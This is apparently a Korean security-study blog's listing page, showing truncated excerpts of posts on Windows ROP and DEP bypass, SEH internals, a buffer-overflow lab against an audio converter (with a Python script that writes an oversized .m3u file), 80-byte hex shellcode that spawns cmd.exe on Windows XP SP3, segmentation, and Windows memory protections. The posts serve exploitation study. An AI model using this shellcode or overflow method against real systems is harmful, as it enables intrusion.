보호되어 있는 글입니다.
Windows ROP(Return Oriented Programming) : Windows 메모리 방어기법 DEP를 우회하기 위한 Overflow 공격기법 DEP에 대한 간략한 내용은 아래 url 참고http://tribal1012.tistory.com/entry/Windows-%EB%B3%B4%EC%95%88-%EA%B8%B0%EB%B2%95 실습 환경Windows XP sp2 영문판 DEP가 보호 중인 상태에서 쉘 코드 실행 접근 오류(Code 0xC0000005)가 발생하여 공격이 실패하는 것을 볼 수 있다. Windows 에서는 Linux와 다르게 특정 API 함수를 사용해서 ShellCode를 실행할 수 있다. 여기서 VirtualAlloc() 함수와 HeapCreate()와 HeapAlloc(..
SEH(Structured Exception Handling) : Windows에서 지원하는 예외처리 중 하나 예외 처리 발생 시 위와 같은 형태로 진행된다.FS라는 Segment Register의 offset[0]의 값을 참조하여 EXCEPTION_REGISTRATION 이라는 녀석을 찾는다.EXCEPTION_REGISTRATION 내부의 Exception Handler가 있는데 이를 통해 예외처리를 하기 위한 예외처리를 호출찾던 예외처리 핸들이 맞을 경우 예외처리 실행, 아닐 경우 prev를 참고하여 다른 EXCEPTION_REGISTRATION를 찾음예외처리가 실행되거나 마지막 EXCEPTION_REGISTRATION에 도달할 때 까지 2~3번 반복 Windows의 SEH 예외처리 방식은 이렇게 진..
취약 프로그램 : https://www.exploit-db.com/exploits/10619/ 실습 환경 : Windows XP sp2 영문판 취약 프로그램 실행 화면 프로그램 설명 : 오디오 파일을 .mp3나 .wav 파일로 컨버팅 해주는 프로그램, 이 프로그램은 .m3u 파일을 실행하는 부분에서 BOF 취약점이 발생한다. 취약점 확인12345dummy = “A”*25000 f = open(“dummy.m3u”, “w”)f.write(dummy)f.close()cs 더미을 25000개 넣고 .m3u 파일을 생성할 경우 파일을 불러오는데는 실패했지만 일단은 돌아간다. 12345dummy = “A”*30000 f = open(“dummy.m3u”, “w”)f.write(dummy)f.close()cs 더미..
XP SP3 Kor Local cmd.exe 실행 및 exit() : 80 byte123456"\x55\x8B\xEC\x83\xEC\x44\x33\xC0\xC6\x44\x24\x04\x63\xC6\x44""\x24\x05\x6D\xC6\x44\x24\x06\x64\x88\x44\x24\x07\x6A\x05\x8D""\x44\x24\x08\x50\xC6\x44\x24\x04\xAD\x90\xC6\x44\x24\x05\x23""\x90\xC6\x44\x24\x06\x86\x90\xC6\x44\x24\x07\x7C\x90\x8B\x44""\x24\x04\x90\x90\x90\x90\x90\xFF\xD0\xD0\x6A\x01\xB8\xFA\xCA""\x81\x7C\xFF\xD0\xD0"Colored by Col..
#----------------------------------- Segmentation -----------------------------------#Segmentation은 메모리에 영역을 분할하고 할당하는 작업이다. PE나 ELF 구조 파일의 경우 섹션을 나눌 경우 페이징에 맞춰 나누기 위해 헤더를 두고 헤더의 오프셋 값을 참조하여 배치하게 되지만 Segmentation의 경우 그렇지 않다. Segment Register를 참조하여 여기의 값을 오프셋으로 사용하여 메모리에 영역을 분할하고 할당한다. 이때, 실제 주소모드와 보호 모드에 따라 약간씩 달라진다. 실제 주소 모드의 경우 레지스터가 가리키는 값이 곧 물리 주소이기 때문에 레지스터의 값을 바로 계산하여 영역을 배치한다.Segment Regi..
http://www.bloter.net/archives/18590 윈도우 7http://forensic-proof.com/archives/3871 윈도우 8http://it.donga.com/21152/ 윈도우 10 날 잡아서 한 번에 별도로 정리를... 간략한 Windows 메모리 방어기법 정리1. GS(특별한 약자 없는 듯 하다... Stack Cookie) Linux의 Stack Guard와 비슷하다. Buffer와 ret 사이에 특정 값을 넣고 체크하는데 이 때 Cookie가 변조될 경우 SEH를 통해 예외처리 실시 Visual Studio 2003 부터 적용되며 SEH Overwrite를 통해 우회 가능 2. SafeSEH (Safe Structured Exception Handling) Win..